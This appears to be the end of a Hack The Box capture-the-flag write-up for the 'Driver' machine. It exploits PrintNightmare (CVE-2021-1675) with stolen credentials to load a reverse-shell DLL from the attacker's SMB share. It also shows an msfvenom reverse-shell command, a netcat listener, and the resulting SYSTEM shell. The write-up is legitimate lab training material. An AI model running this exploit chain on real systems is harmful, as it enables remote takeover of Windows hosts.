                                                                                                                   
┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ python3 CVE-2021-1675.py driver/tony:liltony@10.10.11.106 '\\10.10.14.216\smb\shell-x64.dll'
[*] Connecting to ncacn_np:10.10.11.106[\PIPE\spoolss]
[+] Bind OK
[-] Failed to enumerate remote pDriverPath
module 'impacket.dcerpc.v5.rprn' has no attribute 'hRpcEnumPrinterDrivers'

I was almost sure I had found the right path, but let's not give up. It seems that he is not the first to have this type of problem, and solutions are proposed in the repository forum.

module ‘impacket.dcerpc.v5.rprn’ has no attribute ‘hRpcEnumPrinterDrivers’ · Issue #48 · cube0x0/CVE-2021-1675
Hi, setup: Kali Linux (192.168.0.10) msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f dll -o /tmp/rev.dll /etc/samba/smb.conf [global] map to guest = Bad User serve...
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Ok, let's try again.

┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ python3 CVE-2021-1675.py driver/tony:liltony@10.10.11.106 '\\10.10.14.216\smb\shell-x64.dll'    
[*] Connecting to ncacn_np:10.10.11.106[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.216\smb\shell-x64.dll
[*] Try 1...
Traceback (most recent call last):
  File "/home/in7rud3r/Dropbox/hackthebox/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675/CVE-2021-1675.py", line 188, in <module>
    main(dce, pDriverPath, options.share)
  File "/home/in7rud3r/Dropbox/hackthebox/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.

And once again I don't seem to be the first to have this new problem.

impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist. · Issue #24 · cube0x0/CVE-2021-1675
Hello. I always receive this message: impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist. Has anyone had the same...
┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox]
└─$ smbclient \\\\10.10.14.216\\smb 
Enter WORKGROUP\in7rud3r's password: 
tree connect failed: NT_STATUS_NO_SUCH_USER

Okay, this time it seems to be my fault. Let me comment line "force user = smbuser" and try again.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox]
└─$ smbclient \\\\10.10.14.216\\smb   
Enter WORKGROUP\in7rud3r's password: 
Try "help" to get a list of possible commands.
smb: \> 

Ok, it seems to be working now.

┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ python3 CVE-2021-1675.py DRIVER/tony:liltony@10.10.11.106 '\\10.10.14.216\smb\shell-x64.dll'             130 ⨯
[*] Connecting to ncacn_np:10.10.11.106[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.216\smb\shell-x64.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 568, in writeFile
    return self._SMBConnection.writeFile(treeId, fileId, data, offset)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1650, in writeFile
    written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1358, in write
    if ans.isValidAnswer(STATUS_SUCCESS):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/in7rud3r/Dropbox/hackthebox/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675/CVE-2021-1675.py", line 192, in <module>
    main(dce, pDriverPath, options.share)
  File "/home/in7rud3r/Dropbox/hackthebox/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 856, in request
    self.call(request.opnum, request, uuid)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 845, in call
    return self.send(DCERPC_RawCall(function, body.getData(), uuid))
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1298, in send
    self._transport_send(data)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1235, in _transport_send
    self._transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 535, in send
    self.__smb_connection.writeFile(self.__tid, self.__handle, data)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 570, in writeFile
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

The exploit still reports an error, but it still seems to have worked and my listner gets a fantastic connection from the attacked system.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox]
└─$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.216] from driver.htb [10.10.11.106] 49453
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type c:\users\administrator\desktop\root.txt
type c:\users\administrator\desktop\root.txt
f******************************7

And this time too, the root flag is mine. That's all folks, hack responsibly. See you next time.